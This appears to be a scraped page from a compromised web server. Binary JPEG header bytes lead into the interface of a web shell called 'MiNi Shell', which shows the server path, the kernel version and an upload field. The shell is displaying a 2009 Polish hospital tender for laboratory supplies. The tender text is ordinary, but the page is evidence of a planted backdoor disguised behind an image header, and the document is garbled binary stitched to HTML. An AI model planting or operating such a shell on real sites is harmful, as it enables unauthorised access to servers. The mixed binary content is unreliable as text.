JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090923/162253-N-2009.html

<p class="kh_header"><b>Kutno: Wyroby laboratoryjne</b><br>
<b>Numer ogłoszenia: 162253 - 2009; data zamieszczenia: 23.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kościuszki 52, 99-300 Kutno, woj. łódzkie, tel. 024 3558171, faks 024 355 81 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.kutno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyroby laboratoryjne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa: 
-szkiełek nakrywkowych i podstawowych, kapilar, probówek, naczyniek, pojemników z tworzyw sztucznych, pipet, pałeczek w probówkach jałowych, końcówek do pipet, smoczków do pipet, kuwet, zlewek, płyt do oznaczeń, płytek Petriego - szklanych, kolb, lejków szklanych, cylindrów szklanych, kopert z tworzywa,
-probówek do morfologii, probówek do pomiaru OB., rurek do OB., probówek do koagulologii i biochemii, mikrometod kapilarnych, strzykawek do RKZ, igieł systemowych, aparatów systemowych, staz wielokrotnego użytku, końcówek do rozmazów..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5, 38.43.70.00-7, 33.14.16.15-4, 33.14.13.20-9, 33.14.13.10-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie jest wymagane wniesienie wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I.	Zgodnie z przepisami art. 22 ustawy Prawo zamówień publicznych, o udzielenie zamówienia  mogą ubiegać się Wykonawcy, którzy:
A.  Posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, Zamawiający uzna, że Wykonawca spełnił powyższy warunek jeśli posiada: 
1)	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
2)	Posiada aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
B.  Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
Zamawiający uzna, że Wykonawca spełnił powyższy warunek jeśli:
-	przedstawi wykaz wykonanych co najmniej 3, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że te dostawy zostały wykonane należycie - Wykonawca przedstawi co najmniej 3 dokumenty potwierdzające, że zrealizowane dostawy zostały wykonane należycie, odpowiadają swoim rodzajem dostawom określonym w SIWZ  a ich łączna wartość brutto odpowiada  co najmniej wartości 158.000,00 zł. W przypadku podmiotów składających ofertę wspólną zamawiający uzna, że wykonawca spełnia w/w warunek, jeżeli wykaże, że wykonali łącznie wymaganą liczbę dostaw o wartości łącznej  co najmniej 158.000,00 zł.
C.  Znajdują się w sytuacji ekonomicznej  i finansowej zapewniającej wykonanie zamówienia, 
Zamawiający uzna, że Wykonawca spełnił powyższy warunek jeśli - jest on ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności i suma gwarancyjna wynosi co najmniej 100 000 zł. 
D.  Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Zamawiający uzna, że Wykonawca spełnił powyższy warunek jeśli złoży: 
oświadczenie, że spełnia warunki określone w art.22 ust.1 oraz art. 24 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych.
II.	Potwierdzenie, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego. Zamawiający uzna, że Wykonawca spełnił powyższy warunek jeśli złoży:
oświadczenie Wykonawcy, że oferowany przedmiot zamówienia posiada wszystkie wymagane, aktualne dokumenty (deklaracja zgodności z wymogami zasadniczymi wystawiona przez producenta, wpis/zgłoszenie do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania, certyfikat jednostki notyfikowanej) dopuszczające do obrotu i stosowania zgodnie z przepisami Ustawy z dnia 20 kwietnia 2004r.o wyrobach medycznych lub w przypadku wyrobów nie medycznych inne wymagane dokumenty, zgodnie z obowiązującymi przepisami oraz, że udostępni stosowne dokumenty na każde wezwanie Zamawiającego.
Spełnienie warunków udziału w postępowaniu będzie oceniane na podstawie przedstawionych dokumentów 
wg formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
2.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
3.	Wykaz wykonanych co najmniej 3, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że te dostawy zostały wykonane należycie - Wykonawca przedstawi co najmniej 3 dokumenty potwierdzające, że zrealizowane dostawy zostały wykonane należycie, odpowiadają swoim rodzajem dostawom określonym w SIWZ  a ich łączna wartość brutto odpowiada  co najmniej wartości 158.000,00 zł . W przypadku podmiotów składających ofertę wspólną zamawiający uzna, że wykonawca spełnia w/w warunek, jeżeli wykaże, że wykonali łącznie wymaganą liczbę dostaw o wartości łącznej  co najmniej 158.000,00 zł.
4.	Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności i suma gwarancyjna wynosi co najmniej 100 000 zł.
5.	Oświadczenie, że spełnia warunki określone w art.22 ust.1 oraz art. 24 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych.
6.	Oświadczenie Wykonawcy, że oferowany przedmiot zamówienia posiada wszystkie wymagane, aktualne dokumenty (deklaracja zgodności z wymogami zasadniczymi wystawiona przez producenta, wpis/zgłoszenie do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania, certyfikat jednostki notyfikowanej) dopuszczające do obrotu i stosowania zgodnie z przepisami Ustawy z dnia 20 kwietnia 2004r.o wyrobach medycznych lub w przypadku  wyrobów nie medycznych inne wymagane dokumenty, zgodnie z obowiązującymi przepisami oraz, że udostępni stosowne dokumenty na każde wezwanie Zamawiającego.
7.	Pełnomocnictwo do podpisania oferty ( nie jest wymagane, jeśli podpisujący ofertę jest lub są właścicielami firmy lub jeśli są wymienieni z imienia i nazwiska w dokumencie rejestracyjnym).
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, to zgodnie z § 2 ust.1 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawców, oraz form, w jakich te dokumenty mogą być składane, składa odpowiednie dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - Jakość - 50</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.kutno.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kutno 99-300, ul. Kościuszki 52.SIWZ można odebrać osobiście-pokój 07d w godz. od 8:00 do 14:00 bądź pocztą po uprzednim, pisemnym wniosku złożonym na adres Zamawi. lub złożonym faksem na nr0243558141.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2009 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej ul. Kościuszki 52, 99-300 Kutno Sekretariat Dyrektora..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pracownikiem uprawnionym do kontaktowania się  z Wykonawcami oraz do udzielania wyjaśnień w godz. 800 - 1400 jest  st. inspektor ds. zamówień publicznych i umów Monika Lewandowska tel./fax 0-24- 355-81-71. Adres poczty elektronicznej: m.lewandowska@szpital.kutno.pl.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Szkiełka nakrywkowe ~ 22 x 22 grubość, 0,13 -0,17 mm	20000
2.		Szkiełka nakrywkowe ~24/32 	11000
3.		Szkiełka nakrywkowe ~24/24 	8000
4.		Szkiełka podstawowe  z polem do opisu /kolorowe/  cięte o gr. 1 mm  matówka, kolor dowolny (oprócz białego)	8000
5.		Szkiełka podstawowe szlifowane 1 mm	2500
6.		Kapilary o poj. 175 mikrol. śr. 2,35 mm dł. 100 mm  z heparyną sodową (bez zatyczek i mieszadełek).	10000
7.		Kapilary o poj. 175 mikrol. śr. 2,35 mm dł. 100 mm  z heparyną sodową z zatyczkami i mieszadełkami 	5000
8.		Kapilary o poj. 130 mikrol. Śr. 2,35 mm dł. 75 mm  z heparyną sodową (bez zatyczek i mieszadełek).	5000
9.		Kapilary hematokrytowe z heparyną sodową o poj. ~65mikr. dł. ~75mm śr. zew.1,4mm	8000
10.		Naczyńka do określenia czasu krzepnięcia do koagulometru CC-3003	30000
11.		Probówki PS 9-10 ml (16x100) stożkowe (mogą być z polistyrenu) ze znacznikiem	3000
12.		Probówki wirownicze szklane okrągłodenne 16x100	1000
13.		Probówki  do  morfologii  PS  okrągłodenne   z EDTA - K 2 na  2 ml krwi z etykietą i przebijalnym korkiem - korek jasnofioletowy lub czerwony	1000
14.		Probówki  do  morfologii  PS  okrągłodenne  z  EDTA - K 2  na 1 ml krwi z etykietą i przebijalnym korkiem - korek jasnofioletowy 	      1000
15.		Probówki PP do koagulologii z cytrynianem sodu 3,2% na 1,8 ml krwi z etykietą korek  jasnoniebieski 	500
16.		Probówka PP typ EPPENDORF 1,5 ml stożkowa bezbarwna	1000
17.		Probówki PS 10 ml (16x100) z granulatem i akceleratorem do szybkiego wykrzepiania krwi z etykietą 	      1000
18.		Probówki PS 5 ml (12x88) z granulatem i akceleratorem do szybkiego wykrzepiania krwi z etykietą	1000
19.		Pipeta Pasteura szklana o dł. ~155-230mm i śr. 7 mm	300
20.		Pipeta Pasteura jednorazowa o dł. ~230mm niejałowa	200
21.		Smoczek gumowy /Balonik/ mały ( do pipety Pasteura)	100
22.		Pojemniki do moczu o poj.od 110 do 120 ml roz. ~55x70mm, zakręcane, sterylne	2500
23.		Pojemniki do moczu niesterylne o poj.od 110 do 120 ml - kolor nakrętki inny niż czerwony z etykietą lub polem do opisu	15000
24.		Pojemniki z zakrętką i łopatką do kału o poj.~30 ml z etykietą	1000
25.		Pałeczki w probówkach jałowe do pobierania wymazów (drewniane lub plastikowe) śr.~11mm dł. 150-170mm śr. wacika ~5mm 	6000
26.		Końcówki do pipet automatycznych o poj. 200mikr. żółte typ EPPENDORF lub GILSON	30000
27.		Końcówki o poj. 1000 mikrl.l niebieskie  typ EPPENDORF lub GILSON	25000
28.		Naczyńka do analizatora Cobas  o poj.0,7 ml białe 	35000
29.		Zlewki 250 ml niskie lub wysokie-szklane	10
30.		Zlewki 500-600 ml niskie lub wysokie- szklane	25
31.		Zlewki 1000 ml  wysokie- szklane	5
32.		Kolby o poj. 2 litry płaskodenne z krótką wąską szyjką - szklane	15
33.		Probówki PS 4-5 ml (12x75) okrągłodenne	40000
34.		Probówki PS 10 ml (16x100) okrągłodenne	15000
35.		Pipety automatyczne  z wyrzutnikiem końcówek o poj. 100mikrolitrów	3
36.		Pipety automatyczne  z wyrzutnikiem końcówek o poj. 50mikrolitrów	3
37.		Pipety automatyczne  z wyrzutnikiem końcówek o poj. 500mikrolitrów	2
38.		Pipety automatyczne  z wyrzutnikiem końcówek o pojemn.. nastawnej 100-1000mikrolitrów	1
39.		Pałeczki w probówkach jałowe do pobierania wymazów (drewniane lub plastikowe) śr.~11mm dł. 150-170mm sr. wacika ~5mm z podłożem transportowym. Amies z węglem lub Stuart	3000
40.		Pałeczki w probówkach jałowe do pobierania wymazów (drewniane lub plastikowe) śr.~11mm dł. 150-170mm sr. wacika ~5mm z podłożem transportowym. Amies bez  węgla lub Stuart	3000
41.		Probówki Falcone o poj. 50ml. o wymiarach: 30x115mm, stożkowe z podziałką, sterylne	200
42.		Płytki Petriego szklane , niesterylne śr.120 mm	200
43.		Płytki Petriego szklane , niesterylne śr.100 mm	200
44.		Płytki Petriego szklane , niesterylne śr.80 mm	100
45.		Płytki Petriego szklane , niesterylne śr.60 mm	100
46.		Naczynka z kulką do określania czasu krzepnięcia	1000
47.		Płyty do oznaczeń grup krwi i serologii na 30 testów ( 5x 6 dołkowe ) z rowkiem  usztywniającym	1000
48.		Płyty do oznaczeń grup krwi i serologii na 35 testów ( 5 x 7 dołkowe) z rowkiem usztywniającym	1200
49.		Zlewki na 50 ml szklane wysokie	25
50.		Zlewki na 2000ml szklane wysokie	5
51.		Lejki szklane  śr. Czaszy 100 mm, wysokość czaszy 80 mm , długość rurki 70 mm	10
52.		Cylinder szklany na 50 ml skalowany	20
53.		Koperty z tworzywa  na 2 szt. preparatów mikroskopowych o wym. 65 / 85 mmm	50.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5, 38.43.70.00-7, 33.14.16.15-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Probówka do morfologii na 1- 2 ml krwi z EDTA -K 2/ fioletowy korek/ sterylnaz tworzywa sztucznego.	30 000
2.	Probówka na 2 ml krwi  do  mleczanów, glukozy ( z NaF i szczawianem potasu / szary korek/ sterylna z tworzywa sztucznego	5000
3.	Probówka do pomiaru OB. ok. 1,6 ml  z 3,8 % cytrynianem sodu z czarnym korkiem , sterylne. Metoda liniowa. 	7000
4.	Rurka do oznaczania OB. 	7000
5.	Probówka do koagulologii na 1,8 ml krwi z 3,2 % cytrynianem sodu/ jasnoniebieski korek/ sterylna z tworzywa sztucznego.	15000
6.	Probówki  do koagulologii na  2.5 ml- 2.8 ml  z 3,2 % cytrynianem sodu/ jasnoniebieski korek/ sterylne z tworzywa sztucznego	3000
7.	Probówka biochemiczna na 1 - 2 ml krwi zawierająca  aktywator wykrzepiania / czerwony korek / sterylne z tworzywa sztucznego	2000
8.	Probówka biochemiczna na 4 ml krwi zawierająca  aktywator wykrzepiania / czerwony korek/ sterylna z tworzywa sztucznego .	23000
9.	Probówka biochemiczna na 6 ml krwi zawierająca  aktywator wykrzepiania / czerwony korek/ sterylne z tworzywa sztucznego.	20000
10.	Probówka biochemiczna na 9-10 ml krwi zawierająca  aktywator wykrzepiania / czerwony korek/ stwrylna	7000
11.	Mikrometoda kapilarna-morfologia z EDTA-K2 na 200 ul krwi 	2000
12.	Mikrometoda kapilarna surowica  na 200-500 ul krwi	200
13.	Mikrometoda kapilarna  z fluorkiem do  glukozy na  200 -500 ul krwi	200
14.	Strzykawka do RKZ na 1-2 ml z heparyną litową	1500
15.	Igły systemowe sterylne do pobierania krwi w rozmiarze : ok.0.7; 0,8; 0.9o długości ok.38 i 25  mm z możliwością identyfikacji rozmiaru barwą kolorową	25000
16.	Igły systemowe sterylne do pobierania krwi motylkowe, z integrowaną osłonką zabezpieczającą, blokującą igłę po pobraniu, z zabezpieczeniem przed  zakłuciem w rozmiarze : ok.0,6 ; 0,7 z wężykiem o długości około 170 i 300 mm	6000
17.	Igły systemowe sterylne do pobierania krwi przezierne w rozmiarze :ok. 0,7 ; 0,8 o długości ok.38 mm z możliwością identyfikacji rozmiaru barwą kolorową	3000
18.	Igły systemowe sterylne do pobierania krwi bezpieczne w rozmiarze : ok.0,7 ; 0,8 o długości ok.38 mm z możliwością identyfikacji rozmiaru barwą kolorową	3000
19.	Adapter systemowy sterylny luer z zaworkiem	15000
20.	Uchwyt jednorazowy systemowy 	40000
21. 	 Stazy wielokrotnego użytku 	50
22.	Końcówka do rozmazów hematologicznych	200.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5, 33.14.13.20-9, 33.14.13.10-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Jakość - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com